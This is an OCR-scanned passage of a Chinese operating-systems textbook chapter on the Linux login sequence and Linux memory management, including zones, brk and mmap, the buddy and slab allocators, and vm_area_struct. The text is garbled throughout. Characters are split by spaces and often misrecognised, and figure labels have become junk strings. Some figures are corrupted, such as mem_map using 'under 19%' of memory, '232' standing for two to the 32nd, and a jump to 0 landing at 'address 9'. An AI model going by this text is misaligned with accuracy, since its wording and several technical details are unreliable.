加 文件 系统 、 开 局 守护 进程 等 。 然 后 这 个 进程 从 /etc/ttys 中 读 取 数据 ， 其 
中 /etc/ttys 列 出 了 所 有 的 终端 和 它们 的 属性 。 对 于 每 一 个 局 用 的 终端 ， 这 
个 进程 调用 fork 函 数 创 建 一 个 自 喘 的 副本 ， 进 行内 部 处 理 并 运行 一 个 名 
为 getty 的 程序 。 


getty 程 序 设置 行 速率 以 及 其 他 的 行 属性 比如， 有 一 些 可 能 是 调制 
REVIA) ， 然 后 在 终端 的 屏幕 上 输出 : 


login: 








等 待 用 户 从 键盘 键入 用 户 名 。 当 有 人 坐 在 终端 前 ， 提 供 了 一 个 用 户 
名 后 ，getty 程 序 就 结束 了 ， 登 录 程 序 /bin/login 开 始 运 行 。login 程 序 要 求 
输入 密码 ， 给 密码 加 密 ， 并 与 保存 在 密码 文件 /etc/passwd 中 的 加 密 密 码 
进行 对 比 。 如 果 是 正确 的 ，login 程 序 以 用 户 shell 程 序 蔡 换 自 刁 ， 等 待 第 
一 个 命令 。 如 果 是 不 正确 的 ，login 程 序 要 求 输入 另 一 个 用 户 名 。 这 种 机 


制 如 图 10-11 所 示 ， 该 系统 具有 三 个 终端 。 





进程 0 





SIL 


图 10-11 用 于 启动 一 些 Linux 系 统 的 进程 顺序 


在 图 中 ，0 号 终端 上 运行 的 getty 程 序 仍 然 在 等 待 用 户 输入 。1 号 终端 
上 ， 用 户 已 经 键入 了 登录 名 ， 所 以 getty 程 序 已 经 用 login 程 序 蔡 换 掉 自 
身 ， 目 前 正在 等 待 用 户 输入 密码 。2 号 终端 上 ， 用 户 已 经 成 功 登 录 ， 
shell 程 序 显 示 提 示 符 〈%) 。 然 后 用 户 输 入 

















ep? EL f2 








shell 程 序 将 调用 fork 函 数 创 建 一 个 子 进 程 ， 并 使 这 个 子 进程 运行 cp 
程序 。 然 后 shell 程 序 被 阻 窒 ， 等 得 子 进程 结束 ， 子 进程 结束 之 后 ，shell 
程序 会 显示 新 的 提示 符 并 且 读 取 键 盘 输 入 。 如 果 2 写 终端 的 用 户 不 是 键 
入 了 cp 命令 而 是 cc 命令 ，C 语 言 编译 占 的 主 程序 就 会 被 局 动 ， 这 将 生成 








更 多 的 子 进程 来 运行 不 同 的 编译 过 程 。 


10.4 Linux 中 的 内 存 管理 


Linux 的 内 存 模型 简单 明了 ， 这 样 使 得 程序 可 移植 并 且 能 够 在 内 存 
管理 单元 大 不 相同 的 机 器 上 实现 Linux， 比 如 : 从 没有 内 存 管 理 单元 的 
机 器 〈 如 ， 原 始 的 IBM PC) 到 有 复杂 分 页 硬件 支持 的 机 器 。 这 一 块 设 
计 领 域 在 过 去 数 十 年 几乎 没有 发 生 改 变 。 下 面 要 介绍 该 模型 以 及 它 是 如 
何 实现 的 。 








10.4.1 基本 概念 


每 个 Linux 进 程 都 有 一 个 地 址 空间 ， 巡 辑 上 有 三 段 组 成 : 代码 、 数 
据 和 堆栈 段 。 图 10-12a 中 的 进程 A 就 给 出 了 一 个 进程 空间 的 例子 。 代 码 
段 包 含 了 形成 程序 可 执行 代码 的 机 器 指令 。 它 是 由 编译 侣 和 汇编 器 把 
C、Cr++ 或 者 其 他 程序 源码 转换 成 机 器 代码 而 产生 的 。 通 常 ， 代 码 段 是 
只 读 的 。 由 于 难以 理解 和 调试 ， 目 修改 程序 早 在 大 约 1950 年 就 不 再 时 兴 
了 。 因 此 ， 代 码 段 既 不 增长 也 不 减少 ， 总 之 不 会 发 生 改 变 。 











堆栈 指针 一 > 堆栈 指针 
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A 10-12 加 进程 A 的 虚拟 地 址 空间 ; b) 物 理 内 存 ; gj 进程 B 的 虚拟 地 址 


空间 








数据 段 包 含 了 所 有 程序 变量 、 字 符 串 、 数 字 和 其 他 数据 的 存储 。 它 
有 两 部 分 ， 初 始 化 数据 和 未 初始 化 数据 。 由 于 历史 的 原因 ， 后 者 束 是 我 
们 所 知道 的 BSS 历史 上 称 作 符 写 起 始 块 )。 数 据 段 的 初始 化 部 分 包括 
编译 器 肖 量 和 那些 在 程序 局 动 时 束 需 要 一 个 初始 值 的 变量 。 所 有 BSS 部 
分 中 的 变量 在 加 载 后 被 初始 化 为 0。 





例如 ， 在 C 语 言 中 可 以 在 声明 一 个 字符 串 的 同时 初始 化 它 。 当 程序 
司 动 的 时 候 ， 字 符 串 要 拥有 其 初始 值 。 为 了 实现 这 种 构造 ， 编 译 器 在 地 
址 空间 给 字符 串 分 配 一 个 位 置 ， 同 时 保证 在 程序 局 动 的 时 候 该 位 置 包含 
了 合适 的 字符 串 。 从 操作 系统 的 角度 来 看 ， 初 始 化 数据 跟 程 序 代 码 并 没 





有 什么 不 同一 一 二 者 都 包含 了 由 编译 占 产 出 的 位 串 ， 它 们 必须 在 程序 局 
动 的 时 候 加 载 到 内 存 。 





未 初始 化 数据 的 存在 实际 上 仅仅 是 个 优化 。 如 果 一 个 全 局 变量 未 显 
式 地 初始 化 ， 那 么 C 语 言 的 语义 说 明 它 的 初始 值 是 0(。 实 际 上 ， 大 部 分 全 
局 变量 并 没有 显 式 初始 化 ， 因 此 都 是 0。 这 些 可 以 简单 地 通过 设置 可 执 
行文 件 的 一 个 段 来 实现 ， 其 大 小 刚好 等 于 数据 所 需 的 字 节 数 ， 同 时 初始 
化 包括 缺 省 值 为 零 的 所 有 量 。 





然而 ， 为 了 市 省 可 执行 文件 的 空间 ， 并 没有 这 样 做 。 取 而 代 之 的 
是 ， 文 件 包含 所 有 显 式 初始 化 的 变量 ， 跟 随 在 程序 代码 之 后 。 那 些 未 初 
始 化 的 变量 都 被 收集 在 初始 化 数据 之 后 ， 因 此 编译 避 要 做 的 束 是 在 文件 
头 部 放 入 一 个 字段 说 明 要 分 配 的 字 市 数 。 


为 了 清楚 地 说 明 这 一 点 ， 再 考虑 图 10-12a。 这 里 代码 段 的 大 小 是 
8KB， 和 初始 化 数据 段 的 大 小 也 是 8KB。 未 初始 化 数据 (BSS) 是 4KB。 
可 执行 文件 仅 有 16KB〔 代 码 + 初 始 化 数据 ， ， 加 上 一 个 很 短 的 头 部 来 告 
诉 系统 在 初始 化 数据 后 另外 再 分 配 4KB， 同 时 在 程序 启动 之 前 把 它们 初 
始 化 为 0。 这 个 技巧 避免 了 在 可 执行 文件 中 存储 4KB 的 0。 














为 了 避免 分 配 一 个 全 是 0 的 物理 页 框 ， 在 初始 化 的 时 候 ，Linux 束 分 
配 了 一 个 静态 零 页 面 ， 即 一 个 全 0 的 写 保 护 页 面 。 当 加 载 程序 的 时 候 ， 
未 初始 化 数据 区 域 被 设置 为 指向 该 零 页 面 。 当 一 个 进程 真正 要 写 这 个 区 








域 的 时 候 ， 写 时 复制 的 机 制 就 开始 起 作用 ， 一 个 实际 的 页 框 补 分 配给 该 
进程 。 














跟 代码 段 不 一 样 ， 数 据 段 可 以 改变 。 程 序 总 是 修改 它 的 变量 。 而 
且 ， 许 多 程序 需要 在 执行 时 动态 分 配 空间 。Linux 允 许 数据 段 随 厦 内 存 
的 分 配 和 回收 而 增长 和 缩减 ， 通 过 这 种 机 制 来 解决 动态 分 配 的 问题 。 有 
一 个 系统 调用 brk， 多 许 程序 设置 其 数据 段 的 大 小 。 那 么 ， 为 了 分 配 更 
多 的 内 存 ， 一 个 程序 可 以 增加 数据 段 的 大 小 。C 库 函数 malloc 通 种 被 用 
来 分 配 内 存 ， 它 就 大 量 使 用 这 个 系统 调用 。 进 程 地 址 空间 描述 符 包 合 信 
A: 进程 动态 分 配 的 内 存 区 域 〈 通 和 叫做 堆 ，heap) 的 范围 。 








三 段 是 栈 段 。 在 大 多 数 机 器 里 ， 它 从 虚拟 地 址 空间 的 顶部 或 者 附 
近 开 始 ， 并 且 向 下 生长 。 例 如 ， 在 32 位 x86 平 台 上 ， 栈 的 起 始 地 址 是 
0xC0000000， 这 是 在 用 户 态 下 对 进程 可 见 的 3GB 虚 拟 地 址 限制 。 如 果 栈 
生长 到 了 栈 段 的 底部 以 下 ， 就 会 产 出 一 个 硬件 错误 同时 操作 系统 把 栈 段 
的 底部 降低 一 个 页 面 。 程 序 并 不 显 式 地 控制 栈 段 的 大 小 。 





当 一 个 程序 局 动 的 时 候 ， 它 的 栈 并 不 是 空 的 。 相 反 ， 它 包含 了 所 有 
的 环境 变量 以 及 为 了 调用 它 而 向 shell 输 入 的 命令 行 。 这 样 ， 一 个 程序 就 
可 以 发 现 它 的 参数 了 。 比 如 ， 当 输入 以 下 命令 


cp src dest 





时 ，cp 程 序 运 行 ， 并 且 栈 上 有 字符 串 “cp src dest”, XEFE mtn A 
找到 源 文件 和 目标 文件 的 名 字 。 这 些 字符 串 被 表示 为 一 个 指针 数组 来 指 
回 字 符 串 中 的 符号 ， 使 得 解析 更 加 容易 。 





当 两 个 用 户 运行 同样 的 程序 ， 比 如 编辑 器 ， 可 以 在 内 存 中 立刻 保持 
该 编辑 器 程序 代码 的 两 个 副本 ， 但 是 并 不 高 效 。 相 反 地 ， 大 多 数 Linux 
系统 文 持 共享 代码 段 。 在 图 10-12a 和 图 10-12c 中 ， 可 以 看 到 两 个 进程 A 
和 B 拥 有 相同 的 代码 段 。 在 图 10-12b 中 可 以 看 到 物理 内 存 的 一 种 可 能 
局 ， 其 中 两 个 进程 共享 了 同样 的 代码 片段 。 这 种 映射 是 通过 虚拟 内 存 硬 
件 来 实现 的 。 


数据 段 和 栈 段 从 来 不 共享 ， 除 非 是 在 一 个 fork 之 后 ， 并 且 仅 仅 是 那 
些 没 有 被 修改 的 页 面 。 如 果 二 者 之 一 要 增长 但 是 没有 邻近 的 空间 来 增 
长 ， 这 并 不 会 产生 问题 ， 因 为 在 虚拟 地 址 空间 中 邻近 的 页 面 并 不 一 定 要 
映射 到 邻近 的 物理 页 面 上 。 





在 有 些 计算 机 上 ， 硬 件 支 持 指令 和 数据 拥有 不 同 的 地 址 空间 。 如 果 
有 这 个 特性 ，Linux 就 可 以 利用 它 。 例 如 ， 在 一 个 32 位 地 址 的 计算 机 上 
如 果 有 这 个 特性 ， 那 么 就 有 232 字 节 的 指令 地 址 空间 和 232 字 节 的 数据 地 
址 空间 。 一 个 到 0 的 跳 转 指令 跳 入 到 代码 段 的 地 址 9， 而 一 个 从 0 的 移动 
使 用 数据 空间 的 地 址 0。 这 使 得 可 用 的 数据 空间 加 倍 。 


除了 动态 分 配 更 多 的 内 存 ，Linux 中 的 进程 可 以 通过 内 存 映 射 文件 


来 访问 文件 数据 。 这 个 特性 使 我 们 可 以 把 一 个 文件 映射 到 进程 空间 的 一 
部 分 而 该 文件 就 可 以 像 位 于 内 存 中 的 字 节 数组 一 样 被 读 写 。 把 一 个 文件 
映射 进来 使 得 随机 读 写 比 使 用 read 和 write 之 类 的 IO 系 统 调用 要 容易 的 
多 。 共 吾 库 的 访问 就 是 用 这 种 机 制 映射 进来 后 进行 的 。 在 图 10-13 中 ， 
我 们 可 以 看 到 一 个 文件 被 同时 映射 到 两 个 进程 中 ， 但 在 不 同 的 虚拟 地 址 
Es 
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图 10-13 两 个 进程 可 以 共享 一 个 映射 文件 


10.4.2 Linux PAA E H A Stal 


POSIX 没 有 给 内 存 管理 指定 任何 系统 调用 。 这 个 主题 被 认为 是 太 依 
赖 于 机 器 而 不 便于 标准 化 。 可 是 ， 这 个 问题 通过 这 样 的 说 法 被 隐藏 起 来 
了 : 那些 需要 动态 内 存 管理 的 程序 可 以 使 用 malloc 库 函数 〈 由 ANSIC 标 
准 定义 ) 。 那 么 malloc 是 如 何 实现 的 就 被 推 到 了 POSIX 标 准 之 外 了 。 在 
一 些 圈 子 里 ， 这 种 方法 被 认为 是 推 外 责 任 。 





实际 上 ， 许 多 Linux 系 统 有 管理 内 存 的 系统 调用 。 最 常见 的 列 在 了 
图 10-14 中 。brk 通 过 给 出 数据 段 之 外 的 第 一 个 字 节 地 址 来 指定 数据 段 的 
大 小 。 如 有 果 新 值 比 原来 的 要 大 ， 那 么 数据 段 变 大 ;， 反之， 数据 段 缩 减 。 


系统 调用 |B 
s=brk (addr) E 改变 数据 段 大 小 


a=mmap (addrlen,prot,flags,fd,offset) 映射 文件 | | 
取消 映射 文件 | 


图 10-14 跟 内 存 管理 相关 的 一 些 系统 调用 。 若 遇 到 错误 则 返回 码 s 
为 -1; a 和 addr 是 内 存 地 址 ，len 是 长 度 ，prot 是 控制 保护 ，flags 是 混杂 位 









































s=unmap (addr,len) 





事 ，fd 是 文件 描述 符 ，offset 是 文件 偏 移 


mmap 和 munmap 系 统 调用 控制 内 存 映射 文件 。mmap 的 第 一 个 参 
数 ，addr， 决 定 文件 被 映射 的 地 址 。 它 必须 是 页 大 小 的 倍数 。 如 果 这 个 





参数 是 0， 系 统 确 定 地 址 并 且 返 回 到 a 中 。 第 二 个 参数 len 指 示 要 映射 的 字 
市 数 。 它 也 必须 是 页 大 小 的 整数 倍 。 第 三 个 参数 ，prot， 确 定 对 映射 文 
件 的 保护 。 它 可 以 标记 为 可 读 、 可 写 、 可 执行 或 者 三 者 的 组 合 。 第 四 个 
参数 ，flags， 控 制 文件 是 私有 的 还 是 共有 的 以 及 addr 是 一 个 需求 还 是 仅 
仅 是 一 个 提示 。 第 五 个 参数 ，fd， 是 要 映射 的 文件 的 描述 符 。 只 有 打开 
的 文件 是 可 以 被 映射 的 ， 因 此 为 了 映射 一 个 文件 ， 首 先 必须 要 打开 它 。 
最 后 ，offset 告 诉 从 文件 中 的 什么 位 置 开 始 映射 。 并 不 一 定 要 从 第 0 个 字 
节 开 始 映射 ， 任 何 页 面 边 界 都 是 可 以 的 。 

















另 一 个 调用 ，unmap， 移 除 一 个 被 映射 的 文件 。 如 果 仅 仅 是 文件 的 
一 部 分 撤销 映射 ， 那 么 其 他 部 分 仍然 保持 映射 。 


10.4.3 ”Linux 中 内 存 管 理 的 实现 


32 位 机 费 上 的 每 个 Linux 进 程 通常 有 3GB 的 虚拟 地 址 空间 ， 还 有 1GB 
留 给 其 页 表 和 其 他 内 核 数 据 。 在 用 户 态 下 运行 时 ， 内 核 的 1GB 是 不 可 见 
的 ， 但 是 当 进 程 陷入 到 内 核 时 是 可 以 访问 的 。 内 核 内 存 通常 驻 留 在 低 端 
物理 内 存 中 ， 但 是 被 映射 到 每 个 进程 虚拟 地 址 空间 顶部 的 1GB 中 ， 在 地 
址 0xC0000000 和 0xFFFFFFFF (3~4GB) 之 间 。 当 进程 创建 的 时 候 ， 进 
程 地 址 空间 被 创建 ， 并 且 当 发 生 一 个 exec 系 统 调用 时 被 重 写 。 


为 了 人 允许 多 个 进程 共享 物理 内 存 ，Linux 监 视 物理 内 存 的 使 用 ， 在 
用 户 进程 或 者 内 核 构 件 需要 时 分 配 更 多 的 内 存 ， 把 物理 内 存 动态 映射 到 
不 同 进程 的 地 址 空间 中 去 ， 把 程序 的 可 执行 体 、 文 件 和 其 他 状态 信息 移 
入 移出 内 存 来 高 效 地 利用 平台 资源 并 且 保 障 程序 执行 的 进展 性 。 本 章 的 
剩余 部 分 描述 了 在 Linux 内 核 中 负 贡 这 些 操作 的 各 种 机 制 的 实现 。 





1. 物 理 内 存 管理 


在 许多 系统 中 由 于 异 构 硬件 限制 ， 并 不 是 所 有 的 物理 内 存 都 能 被 相 
同 地 对 待 ， 尤 其 是 对 于 VO 和 虚拟 内 存 。Linux 区 分 三 种 内 存 区 域 


(zone) : 


1)ZONE_DMA: 可 以 用 来 DMA 操 作 的 页 。 


2)ZONE_NORMAL: 正常 规则 映射 的 页 。 
3)ZONE_HIGHMEM: 高 内 存 地 址 的 页 ， 并 不 永久 性 映射 。 


内 存 区 域 的 确切 边界 和 布局 是 硬件 体系 结构 相关 的 。 在 x86 硬 件 
上 ， 一 些 设备 只 能 在 起 始 的 16MB 地 址 空间 进行 DMA 操 作 ， 因 此 
ZONE_DMA 就 在 0 一 16MB 的 范围 内 。 此 外 ， 硬 件 也 不 能 直接 映射 
896MB 以 上 的 内 存 地 址 ， 因 此 ZONE_HIGHMEM 就 是 高 于 该 标记 的 任何 
地 址 。ZONE_NORMAL 是 介 于 其 中 的 任何 地 址 。 因 此 在 x86 平 台 上 ， 
Linux 地 址 空间 的 起 始 896MB 是 直接 映射 的 ， 而 内 核 地 址 空间 的 剩余 
128MB 是 用 来 访问 高 地 址 内 存 区 域 的 。 内 核 为 每 个 内 存 区 域 维护 一 个 
zone 数据 结构 ， 并 且 可 以 分 别 在 三 个 区 域 上 执行 内 存 分 配 。 

















Linux 的 内 存 由 三 部 分 组 成 。 前 两 部 分 是 内 核 和 内 存 映射 ， 
被 “ 钉 ” 在 内 存 中 (页 面 从 来 不 换 出 ) 。 内 存 的 其 他 部 分 被 划分 成 页 框 ， 
每 一 个 页 框 都 可 以 包含 一 个 代码 、 数 据 或 者 栈 页 面 ， 一 个 页 表 页 面 ， 或 
者 在 空 几 列表 中 。 








内 核 维护 内 存 的 一 个 映射 ， 该 映射 包含 了 所 有 系统 物理 内 存 使 用 情 
况 的 信息 ， 比 如 区 域 、 空 闲 页 框 等 。 如 图 10-15， 这 些 信息 是 如 下 组 织 
的 。 


首先 ，Linux 维 护 一 个 页 描述 符 数 组 ， 称 为 nem_map， 其 中 页 描述 
符 是 page 类 型 的 ， 而 且 系统 当中 的 每 个 物理 页 框 都 有 一 个 页 描述 符 。 


个 页 描述 符 都 有 个 指针 ， 在 页 面 非 空 闲 时 指向 它 所 属 的 地 址 空间 ， 另 有 
一 对 指针 可 以 使 得 它 跟 其 他 描述 符 形成 双向 链表 ， 来 记录 所 有 的 空闲 页 
框 和 一 些 其 他 的 域 。 在 图 10-15 中 ， 页 面 150 的 页 描述 符 包 含 一 个 到 其 所 
属地 址 空间 的 映射 。 页 面 70、 页 面 80、 页 面 200 是 空闲 的 ， 它 们 是 被 链 
接 在 一 起 的 。 页 描述 符 的 大 小 是 32 字 节 ， 因 此 整个 mem_map 消 耗 了 不 
到 19% 的 物理 内 存 〈 对 于 4KB 的 页 框 ) 。 














因为 物理 内 存 被 分 成 区 域 ， 所 以 Linux 为 每 个 区 域 维护 一 个 区 域 描 
述 符 。 区 域 描述 符 包 含 了 每 个 区 域 中 内 存 利用 情况 的 信息 ， 例 如 活动 和 
非 活动 页 的 数目 ， 页 面 置换 算法 〈 本 章 后 面 介 绍 ) 所 使 用 的 高 低 水 位 ， 
还 有 许多 其 他 的 域 。 


此 外 ， 区 域 描述 符 包含 一 个 空间 区 数组 。 该 数组 中 的 第 个 元 系 标 
记 了 2 个 空闲 页 的 第 一 个 块 的 第 一 个 页 描述 符 。 既 然 可 能 有 多 块 2 个 空 
闲 页 ，Linux 使 用 页 描述 符 的 指针 对 把 这 些 页 面 链接 起 来 。 这 个 信息 在 
Linux 的 内 存 分 配 操作 中 使 用 。 在 图 10-15 中 ，free_area[0] 标 记 所 有 仅 由 
一 个 页 框 组 成 的 物理 内 存 空间 区 ， 现 在 指向 页 面 70， 三 个 空间 区 当中 的 
第 一 个 。 其 他 大 小 为 一 个 页 面 的 空闲 块 也 可 通过 页 描述 符 中 的 链 到 达 。 











Mem_map: 页 描述 符 数组 
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节点 描述 符 
图 10-15 Linux ÉT 


最 后 ，Linux 可 以 移植 到 NUMA 体 系 结构 (不 同 的 内 存 地 址 有 不 同 
的 访问 时 间 ) ， 为 了 区 分 不 同 节 点 上 的 物理 内 存 〈 同 时 避免 跨 节 点 分 配 
数据 结构 ) ， 使 用 了 一 个 节点 描述 符 。 每 个 节点 描述 符 包含 了 内 存 使 用 
的 信息 和 该 节点 上 的 区 域 。 在 UMA 平 台 上 ，Linux 用 一 个 节点 描述 符 描 
述 所 有 的 内 存 。 每 个 页 描述 符 的 最 初 一 些 位 是 用 来 指定 该 页 框 所 属 的 市 
点 和 区 域 的 。 








为 了 使 分 页 机 制 在 32 位 和 64 位 体系 结构 下 高 效 工 作 ，Linux 采 用 了 
一 个 四 级 分 页 策略 。 这 是 一 种 最 初 在 Alpha 系 统 中 使 用 的 三 级 分 页 策 
略 ， 在 Linux 2.6.10 之 后 加 以 扩展 ， 并 且 从 2.6.11 版 本 以 后 使 用 的 一 个 四 
级 分 页 策略 。 每 个 虚拟 地 址 划分 成 五 个 域 ， 如 图 10-16。 目 录 域 是 页 目 
录 的 索引 ， 每 个 进程 都 有 一 个 私有 的 页 目录 。 找 到 的 值 是 指向 其 中 一 个 
下 一 级 目录 的 一 个 指针 ， 该 目录 也 由 虚拟 地 址 的 一 个 域 索 引 。 中 级 页 目 
录 表 中 的 表 项 指向 最 终 的 页 表 ， 它 是 由 虚拟 地 址 的 页 表 域 索引 的 。 页 表 
的 表 项 指向 所 需要 的 页 面 。 在 Pentium 处 理 器 (使 用 两 级 分 页 ) 上 ， 
个 页 的 上 级 和 中 级 目录 仅 有 一 个 表 项 ， 因 此 总 目录 项 就 可 以 有 效 地 选择 
要 使 用 的 页 表 。 类 似 地 ， 在 需要 的 时 候 可 以 使 用 三 级 分 页 ， 此 时 把 上 级 
目录 域 的 大 小 设置 为 0 就 可 以 了 。 
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图 10-16 Linux 使 用 四 级 页 表 


物理 内 存 可 以 用 于 多 种 目的 。 内 核 目 映 是 完全 “ 便 连 线 * 的 ， 它 的 任 
何 一 部 分 都 不 会 换 出 。 内 存 的 其 余部 分 可 以 作为 用 户 页 面 、 分 页 缓存 和 
其 他 目的 。 页 面 缓存 包含 最 近 已 读 的 或 者 由 于 未 来 有 可 能 使 用 而 预 读 的 
文件 块 ， 或 者 需要 与 回 磁盘 的 文件 块 页 面 ， 例 如 那些 被 换 出 到 磁盘 的 用 
户 进程 创建 的 页 面 。 分 页 缓存 并 不 是 一 个 独立 的 缓存 ， 而 是 那些 不 再 需 
要 的 或 者 等 待 换 出 的 用 户 页 面 集合 。 如 果 分 页 缓存 当中 的 一 个 页 面 在 被 
换 出 内 存 之 前 复 用 ， 它 可 以 被 快速 收回 。 














此 外 ，Linux 文 持 动 态 加 载 模 块 ， 最 常见 的 是 设备 驱动 。 它 们 可 以 
征 任意 大 小 的 并 且 必 须 分 配 一 个 连续 的 内 核 内 存 。 这 些 需求 的 一 个 直接 
结果 是 ，Linux 用 这 样 一 种 方式 来 管理 物理 内 存 使 得 它 可 以 随意 分 配 任 
意 大 小 的 内 存 片 。 它 使 用 的 算法 就 是 伙伴 算法 ， 下 面 给 予 描述 。 





2. 内 存 分 配 机 制 


Linux 文 持 多 种 内 存 分 配 机 制 。 分 配 物 理 内 存 页 框 的 主要 机 制 是 页 
面 分 配器 ， 它 使 用 了 著名 的 伙伴 算法 。 


管理 一 块 内 存 的 基本 思想 如 下 。 刚 开始 ， 内 存 由 一 块 连续 的 片段 组 
成 ， 图 10-17a 的 简单 例子 中 是 64 个 页 面 。 当 一 个 内 存 请 求 到 达 时 ， 首 先 
上 舍 入 到 2 的 窘 ， 比 如 8 个 页 面 。 然 后 整个 内 存 块 被 分 割 成 两 六 ， 如 图 b 
所 示 。 因 为 这 些 片 段 还 是 太 大 了 ， 较 低 的 片段 被 再 次 二 分 (c) ， 然 后 
再 二 分 (d) 。 现 在 我 们 有 一 块 大 小 合适 的 内 存 ， 因 此 把 它 分 配给 请 求 


者 ， 如 图 d 所 示 。 
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图 10-17 伙伴 算法 的 操作 





现在 假定 8 个 页 面 的 第 二 个 请 求 到 达 了 。 这 个 请 求 有 Ce) 直接 满足 
了 。 此 时 4 个 页 面 的 第 三 个 请 求 到 达 了 。 最 小 可 用 的 块 被 分 割 (f) ， 然 
后 其 一 半 被 分 配 (g) 。 接 下 来 ，8 页 面 的 第 二 个 块 被 释放 (h) 。 
后 ，8 页 面 的 另 一 个 块 也 被 释放 。 因 为 刚刚 释放 的 两 个 邻接 的 8 页 面 块 来 
目 同一 个 16 页 面 块 ， 它 们 合并 起 来 得 到 一 个 16 页 面 的 块 (i)。 


Linux 用 伙伴 算法 管理 内 存 ， 同 时 有 一 些 附加 特性 。 它 有 个 数组 ， 
其 中 的 第 一 个 元 系 是 大 小 为 1 个 单位 的 内 存 块 列表 的 头 部 ， 第 二 个 元 象 
征 大 小 为 2 个 单位 的 内 存 块 列 表 的 头 部 ， 下 一 个 是 大 小 为 4 个 单位 的 内 存 
块 列 表 的 头 部 ， 以 此 类 推 。 通 过 这 种 方法 ， 任 何 2 的 震 次 大 小 的 块 都 可 
以 快速 找到 。 


这 个 算法 导致 了 大 量 的 内 部 碎片 ， 因 为 如 果 想 要 65 页 面 的 块 ， 必 须 
要 请 求 并 且 得 到 一 个 128 页 面 的 块 。 


为 了 绥 解 这 个 问题 ，Linux 有 另 一 个 内 存 分 配器 ，slab 分 配器 。 它 使 
用 伙伴 算法 获得 内 存 块 ， 但 是 之 后 从 其 中 切 出 slab (更 小 的 单元 并且 


因为 内 核 频繁 地 创建 和 撤销 一 定 类 型 的 对 象 ( 如 task_struct) ， 它 
使 用 了 对 象 缓存 。 这 些 缓存 由 指 问 一 个 或 多 个 slab 的 指针 组 成 ， 而 slab 
可 以 存储 大 量 相 同类 型 的 对 象 。 每 个 slab 要 么 是 满 的 ， 要 么 是 部 分 满 


的 ， 要 么 是 空 的 。 








例如 ， 当 内 核 需要 分 配 一 个 新 的 进程 描述 符 一 个 新 的 
task_struct) 的 时 候 ， 它 在 task 结 构 的 对 象 缓存 中 寻找 ， 首 先 试图 找 一 个 
部 分 满 的 slab 并 且 在 那里 分 配 一 个 新 的 task_struct 对 象 。 如 果 没 有 这 样 的 
slab 可 用 ， 就 在 空 闪 slab 列 表 中 查找 。 最 后 ， 如 果 必 要 ， 它 会 分 配 一 个 
新 的 slab， 把 新 的 task 结 构 放 在 那里 ， 同 时 把 该 slab 连 接 到 task 结 构 对 象 
缓存 中 。 在 内 核 地 址 空间 分 配 连续 的 内 存 区 域 的 kmalloc 内 核 服 务 ， 实 
际 上 就 是 建立 在 slab 和 对 象 缓存 接口 之 上 的 。 


第 三 个 内 存 分 配器 ymalloc 也 是 可 用 的 ， 并 且 用 于 那些 仅仅 需要 虚 
拟 地 址 空间 连续 的 请 求 。 实 际 上 ， 这 一 点 对 于 大 部 分 内 存 分 配 是 成 立 
的 。 一 个 例外 是 设备 ， 它 位 于 内 存 总 线 和 内 存 管理 单元 的 另 一 端 ， 因 此 








并 不 理解 虚拟 地 址 。 然 而 ，vmalloc 的 使 用 导致 一 些 性 能 的 损失 ， 主 要 
用 于 分 配 大 量 连 续 虚 拟 地 址 空间 ， 例 如 动态 插入 内 核 模 块 。 所 有 这 些 内 
存 分 配器 都 是 继承 自 System V 中 的 那些 分 配器 。 








3. 虚 拟 地 址 空间 表示 


虚拟 地 址 空间 被 分 割 成 同 构 连续 页 面 对 齐 的 区 域 。 也 就 是 说 ， 每 个 
区 域 由 一 系列 连续 的 具有 相同 保护 和 分 页 属性 的 页 面 组 成 。 代 码 段 和 映 
射 文件 就 是 区 〈area) 的 例子 〈 见 图 10-15) 。 在 虚拟 地 址 空间 的 区 之 间 
可 以 有 空 际 。 所 有 对 这 些 空隙 的 引用 都 会 导致 一 个 严重 的 页 面 故 障 。 页 
大 小 是 确定 的 ， 例 如 Penti um 是 4KB 而 Alpha 是 8KB。Pentium 支 持 4MB 的 
页 框 ，Linux 可 以 文 持 4MB 的 大 页 框 。 而 且 ， 在 PAE《〈 物 理 地 址 扩展 ) 
模式 下 ，2MB 的 页 大 小 是 支持 的 。 在 一 些 32 位 机 器 上 常用 PAE 来 增加 进 
程 地 址 空间 ， 使 之 超过 4GB。 





在 内 核 中 ， 每 个 区 是 用 vm_area_struct 项 来 描述 的 。 一 个 进程 的 所 有 
vm_area_struct 用 一 个 链表 链接 在 一 起 ， 并 且 按 照 虚拟 地 址 排序 以 便 可 以 
找到 所 有 的 页 面 。 当 这 个 链表 太 长 时 《多 于 32 项 ) ， 就 创建 一 个 树 来 加 
速 搜索 。vm_area_struct 项 列 出 了 该 区 的 属性 。 这 些 属性 包括 : 保护 模式 

如， 只 读 或 者 可 读 可 写 ) 、 是 否 固定 在 内 存 中 《不 可 换 出 ) 、 和 朝向 哪 
个 方 癌 生长 《数据 段 回 上 长 ， 栈 段 回 下 长 ) 。 





vm_area_struct 也 记录 该 区 是 私有 的 还 是 跟 一 个 或 多 个 其 他 进程 共享 


的 。fork 之 后 ，Linux 为 子 进程 复制 一 份 区 链表 ， 但 是 让 父子 进程 指向 相 
同 的 页 表 。 区 被 标记 为 可 读 可 写 ， 但 是 页 面 却 被 标记 为 只 读 。 如 果 任 何 
一 个 进程 试图 写 页 面 ， 就 会 产生 一 个 保护 故障 ， 此 时 内 核 友 现 该 内 存 区 
逻辑 上 是 可 写 的 ， 但 是 页 面 却 不 是 ， 因 此 它 把 该 页 面 的 一 个 副本 给 当前 
进程 同时 标记 为 可 读 可 写 。 这 个 机 制 残 说 明了 写 时 复制 是 如 何 实 现 的 。 
































Vvm_area_struct 也 记录 该 区 是 人 否 在 磁盘 上 有 备份 存储 ， 如 果 有 ， 在 什 
么 地 方 。 代 码 段 把 可 执行 二 进 制 文件 作为 备份 存储 ， 内 存 映射 文件 把 磁 
盘 文 件 作为 备份 存储 。 其 他 区 ， 如 栈 ， 直 到 它们 不 得 不 被 换 出 ， 人 否则 没 
有 备份 存储 被 分 配 。 


一 个 顶层 内 存 描述 符 mm_struct 收 集 属于 一 个 地 址 空间 的 所 有 虚拟 
AXA AMS, MARTA ORS, Boe, Bo 和 用 户 共享 地 
址 空间 的 信息 等 。 一 个 地 址 空间 的 所 有 vm_area_struct 元 素 可 以 通过 内 存 
描述 符 用 两 种 方式 访问 。 首 先 ， 它 们 是 按照 虚拟 地 址 顺序 组 织 在 链表 中 
的 。 这 种 方式 的 有 用 之 处 是 : 当 所 有 的 虚拟 地 址 区 需要 被 访问 时 ， 或 者 
当 内 核查 找 分 配 一 个 指定 大 小 的 虚拟 内 存 区 域 时 。 此 外 ，vm_area_struct 
